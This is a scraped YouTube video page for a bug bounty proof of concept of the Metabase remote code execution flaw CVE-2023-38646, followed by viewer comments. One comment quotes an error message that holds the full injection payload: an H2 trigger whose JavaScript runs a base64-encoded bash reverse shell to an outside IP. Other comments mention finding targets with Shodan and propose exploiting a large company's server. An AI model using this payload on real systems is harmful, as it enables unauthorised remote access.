€7500 Unauthenticated Blind Remote Code Execution Bug Bounty POC | Private Program | CVE-2023-38646

Поделиться
HTML-код
  • Опубликовано: 20 янв 2025

Комментарии • 51

  • @jupulo3507
    @jupulo3507 Год назад +15

    one day im gonna have the same skills as you, great job mate!!

  • @abhinavkumar8052
    @abhinavkumar8052 Год назад +2

    Great video thanks for sharing

  • @parkergaming3123
    @parkergaming3123 Год назад

    Awesome man ! keep it up. Keep up with the good work !

  • @0x0313-p
    @0x0313-p Год назад

    Metabase cve 2023 awesome 🙌

  • @pocketanime06-zo1eu
    @pocketanime06-zo1eu Год назад

    Keep it bro doing great work by teacher other ❤ love from Ronin

  • @GigaTypers
    @GigaTypers 9 месяцев назад

    Thanks pro!
    Could you please paste the full POST request on setup/validate endpoint which you have used ?

    • @abhishekmorla1
      @abhishekmorla1  9 месяцев назад +1

      Perhaps you can join the channel

    • @GigaTypers
      @GigaTypers 9 месяцев назад

      @@abhishekmorla1
      I always got the below error when trying to execute the command. could you please help? or can I consider this as an enough proof of concept for the vulnerability?
      "Error creating or initializing trigger \"PWNSHELL\" object, class \"..source..\", cause: \"org.h2.message.DbException: Syntax error in SQL statement \"\"//javascript
      java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
      \"\" [42000-197]\"; see root cause for details; SQL statement:
      SET TRACE_LEVEL_SYSTEM_OUT 1;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
      java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
      $$--=x [90043-197]"

  • @thebournville
    @thebournville Год назад +1

    Hats off Bro!!!
    Is that all your findings that you upload?

  • @salmansaif-eldin6814
    @salmansaif-eldin6814 Год назад

    How you got these api endpoints with this json parameter and know it will be vulnerable to RCE ?!

    • @abhishekmorla1
      @abhishekmorla1  Год назад

      History

    • @Noctuu
      @Noctuu 10 месяцев назад +1

      ​@@abhishekmorla1 History ? Like the school subject ? What history
      Edit: I know nothing about metabase so i guess to understand the payload I gotta understand Metabase

    • @abhishekmorla1
      @abhishekmorla1  10 месяцев назад

      ​@@Noctuu bro burp history

    • @Noctuu
      @Noctuu 10 месяцев назад

      @@abhishekmorla1 and the payload too i guess ? Or my edit was right ?

  • @Noctuu
    @Noctuu 10 месяцев назад

    Solid af

  • @renrenbei6400
    @renrenbei6400 Год назад

    Very cool.

  • @minhleduc6715
    @minhleduc6715 Год назад

    nice finding

  • @amoh96
    @amoh96 Год назад

    im beginner if im not wrong i understand you found SSRF and u esclate it to RCE by acccess some metadata or sentsive files and u got RCE ? what advccie you give me

    • @yungxxilax9194
      @yungxxilax9194 11 месяцев назад

      bro if im not wrong, he actually finds some kind of newly discovered (or old idk) CVE, posted on Exploit db or other websites, and then search for those vulnerable services, but i have some questions as well, like, if he only does this to websites that is subscribed to bug bounty services

    • @abhishekmorla1
      @abhishekmorla1  9 месяцев назад +1

      join to learn more ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin

  • @devilsworld7299
    @devilsworld7299 Год назад +1

    how to find these kind of bugs can you make a proper tut. on it how to find this type of RCE

  • @gral10
    @gral10 2 месяца назад

    great video, but it should be watch at x0.50 speed

  • @nonolistenlisten2250
    @nonolistenlisten2250 10 месяцев назад

    perfect+++

  • @ghulamyaseen538
    @ghulamyaseen538 Год назад

    How do you find targets for such bugs? Any methodology you follow?

    • @abhishekmorla1
      @abhishekmorla1  Год назад +2

      I use shodan

    • @darkmix4192
      @darkmix4192 5 месяцев назад

      ​@@abhishekmorla1I'll do same concept in web application based signin page? it'll work?

  • @edavidwaner2187
    @edavidwaner2187 7 месяцев назад

    bro help me exploit this
    we can share bounty
    found metabase in billiom dollar company

    • @abhishekmorla1
      @abhishekmorla1  7 месяцев назад

      join the channel ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin

    • @edavidwaner2187
      @edavidwaner2187 7 месяцев назад

      @@abhishekmorla1 I don't think there's any need to join the channel
      U wanna hunt together that cve then reply

  • @Patel_jishan
    @Patel_jishan 5 месяцев назад

    Bro informative video, how you leran this type of bugs?

  • @Neo-x4o
    @Neo-x4o Год назад

    Cool one....may i get this exploit for mysql and postgress
    And why did you add some extra space in the base64 encoded one still confused there

    • @abhishekmorla1
      @abhishekmorla1  Год назад +1

      To remove the equal

    • @Neo-x4o
      @Neo-x4o Год назад

      @@abhishekmorla1 yeah I seen but why did u do that already it's encoded right ? I have doubt in this

  • @احمدفرحان-ت7ك
    @احمدفرحان-ت7ك Год назад

    🎉🎉🎉❤❤❤

  • @mohmino4532
    @mohmino4532 Год назад

    bro ur just amazing hacker . do u guess the endpoint on all requests?

    • @abhishekmorla1
      @abhishekmorla1  Год назад

      Naah bro..😅

    • @mohmino4532
      @mohmino4532 Год назад

      @@abhishekmorla1 Then why do u always copy Endpoint and paste it directly into burp ? i really need to know bro

    • @abhishekmorla1
      @abhishekmorla1  Год назад +1

      Bro study about the cve i mentioned

  • @sambhavjain6929
    @sambhavjain6929 Год назад

    Congratulations, found the video from WhatsApp

    • @sambhavjain6929
      @sambhavjain6929 Год назад

      May I know what kind of laptop you would recommend for bug bounty programs

  • @phlmox8925
    @phlmox8925 11 месяцев назад

    it's CVE-2023-38646

    • @abhishekmorla1
      @abhishekmorla1  10 месяцев назад

      dont copy paste the title

    • @phlmox8925
      @phlmox8925 10 месяцев назад

      ​@@abhishekmorla1 it wasn't there before i commented

  • @csstestusr
    @csstestusr Год назад

    How to find this program? I think it's not hackerone program.right?